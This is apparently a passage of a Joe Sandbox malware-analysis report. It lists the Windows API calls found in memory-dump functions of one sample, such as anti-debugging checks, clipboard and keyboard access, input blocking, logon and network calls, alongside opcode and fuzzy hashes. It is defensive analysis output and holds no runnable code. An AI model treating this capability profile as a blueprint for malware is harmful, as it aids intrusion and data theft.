                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                          • String ID: *.*$\VH
                          • API String ID: 2786137511-2657498754
                          • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                          • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                          • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                          • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                          • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                          • TerminateProcess.KERNEL32(00000000), ref: 00422004
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID: pqI
                          • API String ID: 2579439406-2459173057
                          • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                          • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                          • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                          • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                          APIs
                          • __wcsicoll.LIBCMT ref: 00433349
                          • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                          • __wcsicoll.LIBCMT ref: 00433375
                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __wcsicollmouse_event
                          • String ID: DOWN
                          • API String ID: 1033544147-711622031
                          • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                          • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                          • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                          • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                          APIs
                          • GetKeyboardState.USER32(?), ref: 0044C3D2
                          • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: KeyboardMessagePostState$InputSend
                          • String ID:
                          • API String ID: 3031425849-0
                          • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                          • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                          • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                          • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                          APIs
                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                          • socket.WSOCK32(00000002,00000002,00000011), ref: 0047666F
                          • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorLastinet_addrsocket
                          • String ID:
                          • API String ID: 4170576061-0
                          • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                          • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                          • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                          • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                          APIs
                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                          • IsWindowVisible.USER32 ref: 0047A368
                          • IsWindowEnabled.USER32 ref: 0047A378
                          • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                          • IsIconic.USER32 ref: 0047A393
                          • IsZoomed.USER32 ref: 0047A3A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                          • String ID:
                          • API String ID: 292994002-0
                          • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                          • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                          • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                          • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                          APIs
                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                          • CoInitialize.OLE32(00000000), ref: 00478442
                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                          • CoUninitialize.OLE32 ref: 0047863C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                          • String ID: .lnk
                          • API String ID: 886957087-24824748
                          • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                          • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                          • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                          • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                          APIs
                          • OpenClipboard.USER32(?), ref: 0046DCE7
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                          • CloseClipboard.USER32 ref: 0046DD0D
                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                          • CloseClipboard.USER32 ref: 0046DD41
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                          • CloseClipboard.USER32 ref: 0046DD99
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                          • String ID:
                          • API String ID: 15083398-0
                          • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                          • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                          • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                          • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstNext
                          • String ID:
                          • API String ID: 3541575487-0
                          • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                          • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                          • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                          • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                          APIs
                          • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                          • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                          • FindClose.KERNEL32(00000000), ref: 004339EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: FileFind$AttributesCloseFirst
                          • String ID:
                          • API String ID: 48322524-0
                          • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                          • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                          • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                          • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                          APIs
                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Internet$AvailableDataErrorFileLastQueryRead
                          • String ID:
                          • API String ID: 901099227-0
                          • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                          • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                          • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                          • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                          APIs
                          • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Proc
                          • String ID:
                          • API String ID: 2346855178-0
                          • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                          • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                          • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                          • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                          APIs
                          • BlockInput.USER32(00000001), ref: 0045A38B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                          • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                          • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                          • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                          APIs
                          • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: LogonUser
                          • String ID:
                          • API String ID: 1244722697-0
                          • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                          • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                          • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                          • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                          APIs
                          • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                          • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                          • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                          • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                          • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                          • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                          • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID: N@
                          • API String ID: 0-1509896676
                          • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                          • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                          • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                          • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                          Memory Dump Source
